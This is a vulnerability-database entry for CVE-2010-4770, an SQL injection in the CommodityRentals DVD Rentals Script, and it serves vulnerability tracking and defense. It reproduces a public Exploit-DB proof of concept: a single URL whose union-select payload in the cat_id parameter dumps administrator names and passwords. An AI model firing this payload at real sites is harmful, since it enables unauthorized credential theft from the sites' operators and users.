CVE-2010-4770
Description
SQL injection vulnerability in index.php in CommodityRentals DVD Rentals Script allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a catalog action.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
DVD Rental Software - SQL Injection
# Exploit Title: DVD Rental Software SQL injection Vulnerability
# Date: 19/11/2010
# Author: JaMbA
# Team: SwT
#Script url: http://www.commodityrentals.com/dvd.php
# Version: N/A
# Tested on: Demo
# CVE : ()
###################################################################################
#########################[ EXPL0!T ]#########################
http://server/path/index.php?view=catalog&item_type=M&cat_id=-18+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+rental_admin--
#############################SwT 4
Ever##############################################
GreeTz: SwT Member - ZaTTalova - Med Amine SaSsi - Raouf Matmati - Rami Bof
- Mr adnen smii - Mr zied becher
Dj Dj City Up Up :)
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| commodityrentals | dvd_rentals_script | | |
References
- http://packetstormsecurity.org/files/view/96010/dvdrental-sql.txt
- http://secunia.com/advisories/42330
- http://securityreason.com/securityalert/8159
- http://www.exploit-db.com/exploits/15578
- http://www.securityfocus.com/bid/44988
- http://packetstormsecurity.org/files/view/96010/dvdrental-sql.txt
- http://secunia.com/advisories/42330
- http://securityreason.com/securityalert/8159
- http://www.exploit-db.com/exploits/15578
- http://www.securityfocus.com/bid/44988
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.